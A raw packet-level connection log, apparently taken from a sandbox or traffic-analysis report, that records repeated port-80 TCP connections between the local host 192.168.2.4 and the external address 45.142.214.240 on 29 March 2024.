                                                                        Mar 29, 2024 12:59:18.200798988 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.201076984 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.420671940 CET804976445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:18.507728100 CET804976445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:18.507811069 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.621975899 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.622370958 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.841510057 CET804976445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:18.841609955 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.841814995 CET804976545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:18.841892004 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.842102051 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.061404943 CET804976545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.143948078 CET804976545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.144013882 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.262618065 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.262969971 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.482247114 CET804976545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.482352972 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.483397961 CET804976645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.483479977 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.483683109 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.704222918 CET804976645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.782752991 CET804976645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.782895088 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.903650999 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.903997898 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.123720884 CET804976745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.123826027 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.124058962 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.124609947 CET804976645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.124665022 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.344058990 CET804976745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.427427053 CET804976745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.427565098 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.543848991 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.544298887 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.761734009 CET804976845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.761897087 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.762171030 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.763187885 CET804976745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.763252974 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.979815006 CET804976845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.058628082 CET804976845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.058749914 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.173156023 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.173969984 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.390919924 CET804976845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.390978098 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.393568993 CET804976945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.393639088 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.394081116 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.613420010 CET804976945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.699054003 CET804976945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.699121952 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.813805103 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.814130068 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.033262014 CET804976945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.033354998 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.033576965 CET804977045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.033663034 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.033828974 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.253478050 CET804977045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.338841915 CET804977045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.338975906 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.465507030 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.465830088 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.683783054 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.683871984 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.684058905 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.685347080 CET804977045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.685400963 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.901575089 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.981014013 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.981100082 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.090769053 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.308481932 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:23.392504930 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:23.392570972 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.512465954 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.512820959 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.730604887 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:23.730724096 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.731539965 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:23.731632948 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.732156038 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.950818062 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.030029058 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.030236006 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.138039112 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.357271910 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.440438032 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.440499067 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.559335947 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.559639931 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.777475119 CET804977345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.777570009 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.777762890 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.779717922 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.779778004 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.995261908 CET804977345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:25.074517965 CET804977345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:25.074572086 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:25.184508085 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:25.401913881 CET804977345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:25.488177061 CET804977345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:25.488249063 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:25.606355906 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:25.606662989 CET4977480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:25.825232029 CET804977345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:25.825316906 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:25.828150034 CET804977445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:25.828226089 CET4977480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:25.828412056 CET4977480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:26.049175024 CET804977445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:26.128143072 CET804977445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:26.128201008 CET4977480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:26.246984005 CET4977480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:26.247267008 CET4977580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:26.468374014 CET804977445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:26.468456984 CET4977480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:26.469508886 CET804977545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:26.469584942 CET4977580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:26.471385002 CET4977580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:26.695960999 CET804977545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:26.782794952 CET804977545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:26.783173084 CET4977580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:26.903116941 CET4977580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:26.903400898 CET4977680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:27.122677088 CET804977645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:27.122756004 CET4977680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:27.122910023 CET4977680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:27.125365019 CET804977545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:27.125422001 CET4977580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:27.342010975 CET804977645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:27.429785967 CET804977645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:27.429827929 CET4977680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:27.543673992 CET4977680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:27.544059992 CET4977780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:27.761678934 CET804977745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:27.761974096 CET4977780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:27.762065887 CET4977780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:27.765714884 CET804977645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:27.765918016 CET4977680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:27.980777025 CET804977745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:28.060153961 CET804977745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:28.060209990 CET4977780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:28.169307947 CET4977780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:28.387092113 CET804977745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:28.470686913 CET804977745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:28.472796917 CET4977780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:28.591146946 CET4977780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:28.591432095 CET4977880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:28.808849096 CET804977745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:28.809012890 CET4977780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:28.813565969 CET804977845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:28.813832045 CET4977880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:28.814022064 CET4977880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:29.036251068 CET804977845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:29.115170956 CET804977845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:29.117928028 CET4977880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:29.237418890 CET4977880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:29.237744093 CET4977980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:29.455316067 CET804977945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:29.457856894 CET4977980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:29.458061934 CET4977980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:29.459840059 CET804977845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:29.461821079 CET4977880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:29.675411940 CET804977945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:29.758946896 CET804977945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:29.759058952 CET4977980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:29.871877909 CET4977980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:29.872154951 CET4978080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:30.089278936 CET804977945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:30.089392900 CET4977980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:30.092844009 CET804978045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:30.092950106 CET4978080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:30.093137980 CET4978080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:30.313877106 CET804978045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:30.406164885 CET804978045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:30.406219959 CET4978080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:30.512532949 CET4978080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:30.733091116 CET804978045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:30.812120914 CET804978045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:30.812222004 CET4978080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:30.918915987 CET4978080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:31.140090942 CET804978045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:31.226247072 CET804978045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:31.226325989 CET4978080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:31.342874050 CET4978080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:31.343158007 CET4978180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:31.561980963 CET804978145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:31.562052011 CET4978180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:31.562211037 CET4978180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:31.563570023 CET804978045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:31.563642979 CET4978080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:31.781255960 CET804978145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:31.860681057 CET804978145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:31.860769033 CET4978180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:31.986767054 CET4978180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:31.987179995 CET4978280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:32.207187891 CET804978145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:32.207257986 CET4978180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:32.211260080 CET804978245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:32.211355925 CET4978280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:32.211512089 CET4978280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:32.434437037 CET804978245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:32.516931057 CET804978245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:32.517127037 CET4978280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:32.637504101 CET4978280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:32.637923002 CET4978380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:32.855839968 CET804978345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:32.856055021 CET4978380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:32.856144905 CET4978380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:32.859813929 CET804978245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:32.859868050 CET4978280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:33.073879957 CET804978345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:33.160276890 CET804978345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:33.160449982 CET4978380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:33.278462887 CET4978380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:33.278789997 CET4978480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:33.496123075 CET804978345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:33.496314049 CET4978380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:33.499317884 CET804978445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:33.499420881 CET4978480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:33.499588966 CET4978480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:33.720221996 CET804978445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:33.798856020 CET804978445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:33.799052954 CET4978480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:33.918675900 CET4978480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:33.918869019 CET4978580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:34.137665987 CET804978545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:34.137769938 CET4978580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:34.137988091 CET4978580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:34.139477015 CET804978445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:34.139545918 CET4978480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:34.356820107 CET804978545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:34.440857887 CET804978545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:34.441039085 CET4978580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:34.559536934 CET4978580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:34.559885025 CET4978680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:34.777425051 CET804978645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:34.777510881 CET4978680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:34.777688980 CET4978680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:34.778323889 CET804978545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:34.778381109 CET4978580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:34.995769024 CET804978645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:35.075176001 CET804978645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:35.075285912 CET4978680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:35.201188087 CET4978680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:35.201469898 CET4978780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:35.419003010 CET804978645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:35.419084072 CET4978680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:35.420911074 CET804978745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:35.420983076 CET4978780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:35.421195984 CET4978780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:35.639900923 CET804978745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:35.723900080 CET804978745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:35.723970890 CET4978780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:35.840514898 CET4978780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:35.840791941 CET4978880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:36.058376074 CET804978845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:36.058489084 CET4978880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:36.058656931 CET4978880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:36.074800014 CET804978745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:36.074965000 CET4978780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:36.276284933 CET804978845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:36.364326000 CET804978845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:36.364377975 CET4978880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:36.481128931 CET4978880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:36.481406927 CET4978980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:36.698923111 CET804978945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:36.698945045 CET804978845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:36.699006081 CET4978980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:36.699033976 CET4978880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:36.699173927 CET4978980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:36.917131901 CET804978945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:36.995959044 CET804978945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:36.996036053 CET4978980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:37.106190920 CET4978980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:37.323729992 CET804978945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:37.409293890 CET804978945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:37.409360886 CET4978980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:37.527991056 CET4978980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:37.528286934 CET4979080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:37.745791912 CET804978945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:37.746001005 CET4978980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:37.748874903 CET804979045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:37.748953104 CET4979080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:37.749118090 CET4979080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:37.970321894 CET804979045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:38.048827887 CET804979045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:38.048908949 CET4979080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:38.382874966 CET4979080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:38.383172989 CET4979180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:38.599378109 CET804979145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:38.599483013 CET4979180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:38.599677086 CET4979180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:38.603497982 CET804979045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:38.603547096 CET4979080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:38.815857887 CET804979145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:38.906938076 CET804979145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:38.907064915 CET4979180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:39.750869989 CET4979180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:39.751219988 CET4979280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:39.967755079 CET804979145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:39.967859983 CET4979180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:39.978094101 CET804979245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:39.978180885 CET4979280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:39.978368044 CET4979280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:40.195792913 CET804979245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:40.282648087 CET804979245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:40.282711029 CET4979280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:40.403114080 CET4979280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:40.403506994 CET4979380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:40.619901896 CET804979345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:40.619988918 CET4979380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:40.620979071 CET804979245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:40.621035099 CET4979280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:40.621953011 CET4979380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:40.838164091 CET804979345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:40.917171001 CET804979345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:40.917242050 CET4979380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:41.029453993 CET4979380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:41.245925903 CET804979345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:41.330909014 CET804979345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:41.331060886 CET4979380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:41.450750113 CET4979380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:41.451069117 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:41.667031050 CET804979345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:41.667092085 CET4979380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:41.668397903 CET804979445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:41.668457031 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:41.668621063 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:41.886605024 CET804979445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:41.965167999 CET804979445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:41.965245008 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:42.076478004 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:42.301224947 CET804979445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:42.389615059 CET804979445.142.214.240192.168.2.4
